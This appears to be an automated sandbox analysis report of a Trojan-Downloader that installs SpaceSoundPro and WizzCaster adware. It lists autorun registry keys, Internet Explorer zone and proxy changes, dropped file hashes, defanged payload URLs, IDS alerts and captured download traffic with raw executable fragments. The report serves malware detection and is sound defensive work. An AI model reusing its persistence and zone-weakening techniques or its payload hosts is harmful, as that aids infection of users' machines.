To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"osmsg" = "%Documents and Settings%\All Users\Application Data\WindowsMsg\osmsg.exe /AUTORUN"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\osmsg\DEBUG]
"Trace Level"

The process regsvr32.exe:508 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 0B 07 68 E9 34 69 A3 4D 68 A4 FB 21 D5 E8 94"

The process hp.exe:2404 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

The process nst25.tmp:3184 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 61 5D 00 6F F1 9B 0B 5F 29 DB AA D2 B0 B3 CC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsq6.tmp:1492 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"UninstallString" = "%Program Files%\SpaceSoundPro\UninstallerCaster.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SpaceSoundPro]
"idscservice.exe" = "TGo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayName" = "Caster"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"UninstallString" = "%Program Files%\SpaceSoundPro\uninstaller.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"Publisher" = "Caster"

[HKCU\Software\Microsoft\idsc]
"partner" = "CMI3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\idsc]
"channel" = "3"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SpaceSoundPro]
"wizzcaster.exe" = "BShyah"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 AC 4E 59 DA 86 21 28 AA BA 12 07 84 52 2B BA"

[HKCU\Software\Microsoft\idsc]
"Product" = "spacesoundpro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"HY2F7WRL5V.exe" = "HY2F7WRL5V"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Caster" = "%Program Files%\SpaceSoundPro\wizzcaster.exe"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The process mofcomp.exe:2556 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 9E 6E 0A 90 D0 56 66 5B B7 17 CA C4 0B 35 21"

The process nst18.tmp:2976 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 9E 1D BD 06 EF 59 0E 2C CD 55 B1 51 61 C9 3E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tiantianwifi.exe:2436 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\tiantianwifi\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 73 DB 5E 0A 6C 5D FA 93 C3 CF 88 5E 6C 22 AF"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\tiantianwifi\DEBUG]
"Trace Level"

Dropped PE files

MD5 File path
122ae907c9811b0779165a7030449eb2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\Uninstall.exe
542199ec8faa7cb170b8f663d62ada99 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\qnsm13.tmp
e5a3f3c89679531733cba0e70029af92 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\51MTCANOTX\testversion.exe
3cc05dff26967dcca22bbca93d47ea83 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\51MTCANOTX\win.exe
6ba946cf089d44db5cb918b45cf0daf1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HY2F7WRL5V.exe
bfe060c22b44914e05d3f5367de6c9fe c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd9.tmp\NSISpcre.dll
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\inetc.dll
3fdbfc57c03c91b672af530efe849cb3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp
e3a15c2db8e518055399276d7d6dcebf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq6.tmp
3fdbfc57c03c91b672af530efe849cb3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\1znQuZItQ[1]
82fe604393ec07969e6165a4f7583d2e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\gXvDHtyh[1].exe
1bc7210a802504161b5e4b2dc66d22f1 c:\Program Files\Caster\Uninstaller.exe
eb9b1cbd42d4b64cadaed3378e627676 c:\Program Files\Caster\wizzcaster.exe
416b29d4214d149864d1e7c8f211bdc0 c:\Program Files\SpaceSoundPro\SpaceSoundPro.dll
3bfe76a9b4b9c341eabb5efabf0b35aa c:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
96a486590aefaacc16275d840c18ea55 c:\Program Files\SpaceSoundPro\Uninstall.exe
1bc7210a802504161b5e4b2dc66d22f1 c:\Program Files\SpaceSoundPro\UninstallerCaster.exe
c0a634ba34d6b3464cc6384234758da2 c:\Program Files\SpaceSoundPro\idscservice.exe
f77c28265a32fed3b09b9a0ff06a1555 c:\Program Files\SpaceSoundPro\silentconfigurator.exe
5ade09de54d4263dc0691f4d08153a6c c:\Program Files\SpaceSoundPro\silentunconfigurator.exe
ab3efbe2a7b092daea5f33c4e55151e4 c:\Program Files\SpaceSoundPro\uninstaller.exe
eb9b1cbd42d4b64cadaed3378e627676 c:\Program Files\SpaceSoundPro\wizzcaster.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 2502656 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 2695168 2528 2560 3.13013 cc37a2988eb4efb20cdcece32f04e5f5

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 98
2ad305eb2625cacef55c0e012e3162da
cb786e5da53a1cb3bbc8841f285c513b
9198aa7a8af824ba3f3df352e318417c
a3332be6814b19b59cadddb447f50da5
c77c5d8d47007e0dc6b50f0e527d2ba7
8029d018f586226a64d9f96dc73be594
95306a45a67cefb80b7b7dff2a77042b
457b86002a72e80c1c8fa69b3023f6fb
8b7e2cbb90858cf798304ea8ff4365a4
00ec91d2119886fc75919839d9ab1d00
02ea7565c80d643d4fbb65345258966a
af92469c66bd33cc0924b7ff473ca5cb
c7cf0f6e2eb500f89667e6df69b5e2ca
e540af20d2963fce04ccc3535279698f
94d80f8574725485592e14f9dbac2467
04b2e326f2aaced2951ca6d80f104582
053a3ebc4b11b5b0c571cda302330a12
934cfdb390c68cbec15668542a8155af
a886a3ec98ee12d0bb6b49ff5bcdfeeb
621a30ddc4f47be1927189d7685f85be
e700166a5833a1193b4716234f0248ab
a3885eadbef56e0ae4228d007e362225
228e9e82ac606654f732e3858c67cfd6
78c2cb4d716a37e601875440a1d60d70
c0a32858a48568d659aa2254069c6a06

URLs

URL IP
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ 174.129.23.183
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 50.7.86.58
hxxp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 50.7.86.58
hxxp://dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe 164.132.161.107
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_start 164.132.160.189
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_download_start 164.132.160.189
hxxp://dl.we-want-it.xyz/download/1/wizzproduct.exe 5.135.35.175
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_download_succeed 164.132.160.189
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_execute_succeed 164.132.160.189
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_download_start 164.132.160.189
hxxp://dl.wizzuniquify.com/get/1/spacesoundpro-widget.exe 164.132.161.107
hxxp://www.csdimonetize.com/remotes_xml_sections.php 149.202.85.170
hxxp://dl.we-want-it.xyz/download/3/WizzCasterInstaller.exe 5.135.35.175
hxxp://dl.wizzuniquify.com/download/3/wizzcaster.exe 164.132.161.107
hxxp://dl.wizzuniquify.com/download/3/wizzcasterUninstaller.exe 164.132.161.107
hxxp://dl.we-want-it.xyz/download/1/wizzrelease.exe 5.135.35.175
hxxp://wizzcaster.com/api/v1/configuration?username=csdi&password=68b07047-1e8d-47ef-8332-09a2c83ad539 149.202.72.147
hxxp://wizzcaster.com/api/v2/ads?user_name=csdi&api_key=56f25c2b4eced&days_after_install=0 149.202.72.147
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_download_succeed 164.132.160.189
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_execute_succeed 164.132.160.189
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzuninstaller_download_start 164.132.160.189
hxxp://dl.wizzuniquify.com/get/1/spacesoundpro-uninstaller.exe 164.132.161.107
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzuninstaller_download_succeed 164.132.160.189
hxxp://livestatscounter.com/SysInfo/countup.php?sid=554655542 50.7.86.58
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_done 164.132.160.189
hxxp://agent.wizztrakys.com/csdi/wizzcaster/67 164.132.160.189
hxxp://adnetworkperformance.com/a/display.php?r=1203893
hxxp://adnetworkperformance.com/pix.html
hxxp://adnetworkperformance.com/a/display.php?r=1203893&treqn=863003326&runauction=1&crr=f5829f18bd66e0f9a58a,EmRyUib62556aa2956a48838c36&ctbust=0.12173383931552406&cbtitle=&cbiframe=0&cbdescription=null&cbkeywords=null
hxxp://adnetworkperformance.com/a/display.php?k=5767f84cb4a1512101637.51137939&h=bae4c68faacac27f1f8810fa61cadf9e765a3d52&ban=12101637&iid=1466431564327066441066058003570268&r=1203893&exp=prpd&ci==ov+32bprbe81L+8p7O2gnu73fv5kX6q3e7sx+bvlOO6uXv43jN4p7+93bO5luKszGLt/OLszabt9Wq4yvu5xjN4p7+93bO5lyfvlWcprq/t9W66mHf9iPf6ujN4p7+93bO5lu6t9W64o7e9ifP2gnu73fv5kX6q32bpiL/6mHP2gnu73fv5kXK/9W61luq+32bprbe81L+8p7O2gnu73fv5kX6q3e7sx+bvlOO6uXv43jN4p7+93bO5luqt9Wq4yvu5xjN4p7+93bO5lyfvlScprq/t9W66mHf9iPf6ujN4p7+93bO5lu6t3Obs/2bpjju71L+9YDe6uf/9mTeprebvlKu8rbe8YDe6uf/9mTep83bpdXK/&pm==Uq63Tep&pabt===w6rLf6&pc=l6rv+6rv+6rv+6rvxGbs2Ortpebp&sst=66.231/38.122/0.13/0/5.404&cbiframe=0&id=12101637&iuh==ofpuS8tpO70Cncqnybt1ert1mqspS7pVvMxnOtwJn6p8+7sxmas3K7s3m6tpS7pVvMxnOtwJn6p8Cbtwerspebq1ea1LT8pTLcypeKv2GN1nyrtpK7pTn8p0DP6jnu7QfKv3masnKszUr8p8K+6l7+8mfv6oT+rnebqzi62mv+6u3P6KXavlau8luap/abtpGrvpW7s1m6s+abp9W69uXK/&dmv===g22q6q2qK3&ddv=1&frab=0
hxxp://evfomo.ru/6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb1490yo2hx3hhl52youffqvkfkkf?f_sid=1203893 88.85.84.122
hxxp://evfomo.ru/protJS/LDpxFBktGQEVFCwCBhAHSl5XREYHCxMNCQZGXEomBRABLQ8wDSQqOgEqLB4jCUVfRBIWCkpeRAAQEhhdS0kBChINFQgBGm8MEgUqOzoNBWwIEUkjHBUMBRZGFA4YWxMcCjsVBxEUCwJbVVhyUkBafXJxSEkhFg0FDDoCRV5SX1RVWlBSWlJcX1kZ 88.85.84.122
hxxp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0
hxxp://livestatscounter.com/Generic/zgm.php?sid=8100001 50.7.86.58
hxxp://events.datahouse-us.com/Um7UdXgzvHWLL7R/ 52.87.29.53
hxxp://down.eszju.cn/8001/ttwifi.exe 222.186.52.14
hxxp://www.adnetworkperformance.com/a/display.php?r=1203893
hxxp://www.adnetworkperformance.com/a/display.php?r=1203893&treqn=863003326&runauction=1&crr=f5829f18bd66e0f9a58a,EmRyUib62556aa2956a48838c36&ctbust=0.12173383931552406&cbtitle=&cbiframe=0&cbdescription=null&cbkeywords=null
hxxp://itan.etudios.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0
hxxp://latest-404417.onpato.ru/protJS/LDpxFBktGQEVFCwCBhAHSl5XREYHCxMNCQZGXEomBRABLQ8wDSQqOgEqLB4jCUVfRBIWCkpeRAAQEhhdS0kBChINFQgBGm8MEgUqOzoNBWwIEUkjHBUMBRZGFA4YWxMcCjsVBxEUCwJbVVhyUkBafXJxSEkhFg0FDDoCRV5SX1RVWlBSWlJcX1kZ 88.85.80.183
hxxp://software-repository.com/Generic/zgm.php?sid=8100001 50.7.86.58
hxxp://www.adnetworkperformance.com/a/display.php?k=5767f84cb4a1512101637.51137939&h=bae4c68faacac27f1f8810fa61cadf9e765a3d52&ban=12101637&iid=1466431564327066441066058003570268&r=1203893&exp=prpd&ci==ov+32bprbe81L+8p7O2gnu73fv5kX6q3e7sx+bvlOO6uXv43jN4p7+93bO5luKszGLt/OLszabt9Wq4yvu5xjN4p7+93bO5lyfvlWcprq/t9W66mHf9iPf6ujN4p7+93bO5lu6t9W64o7e9ifP2gnu73fv5kX6q32bpiL/6mHP2gnu73fv5kXK/9W61luq+32bprbe81L+8p7O2gnu73fv5kX6q3e7sx+bvlOO6uXv43jN4p7+93bO5luqt9Wq4yvu5xjN4p7+93bO5lyfvlScprq/t9W66mHf9iPf6ujN4p7+93bO5lu6t3Obs/2bpjju71L+9YDe6uf/9mTeprebvlKu8rbe8YDe6uf/9mTep83bpdXK/&pm==Uq63Tep&pabt===w6rLf6&pc=l6rv+6rv+6rv+6rvxGbs2Ortpebp&sst=66.231/38.122/0.13/0/5.404&cbiframe=0&id=12101637&iuh==ofpuS8tpO70Cncqnybt1ert1mqspS7pVvMxnOtwJn6p8+7sxmas3K7s3m6tpS7pVvMxnOtwJn6p8Cbtwerspebq1ea1LT8pTLcypeKv2GN1nyrtpK7pTn8p0DP6jnu7QfKv3masnKszUr8p8K+6l7+8mfv6oT+rnebqzi62mv+6u3P6KXavlau8luap/abtpGrvpW7s1m6s+abp9W69uXK/&dmv===g22q6q2qK3&ddv=1&frab=0
hxxp://mobilitydata5.com/SysInfo/countup.php?sid=554655542 50.7.184.162


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /get/1/spacesoundpro-widget.exe HTTP/1.1
Host: dl.wizzuniquify.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
3f3212..MZ...............x......@,V................................F..
..........!..L.!This program cannot be run in DOS mode....$.......1..:
u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..........
..............PE..L......K.................^...........0.......p....@.
......................................................................
...t.......P...C......................................................
.....................p...............................text...L\.......^
.................. ..`.rdata.......p.......b..............@[email protected]...
X\[email protected]...`............................
...rsrc....C...P...D...z..............@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................U....\.}..t .}.F.E
[email protected]@..e...E..E.P
.u...Pr@..}[email protected]... M.......M....3.....FQ.....NU
..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u.
[email protected]}[email protected].}.j.W.E......E.......Pp
@[email protected]@.W...E..E.h ...Pj.h`[email protected]...
\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.....
..t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.S
<<< skipped >>>

GET /get/1/spacesoundpro-uninstaller.exe HTTP/1.1


Host: dl.wizzuniquify.com


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:06 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
5de00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...8.gW.........."...0.................. ........@.. .................
......@[email protected]............
................ .....................................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@[email protected]....... .............
[email protected]........$...............9..X....
........................................0..!.........(.........~.....(
.............*...................&.(......*...0..9........~.........,"
.r...p.....(....o....s............~..... ..*....0...........~..... ..*
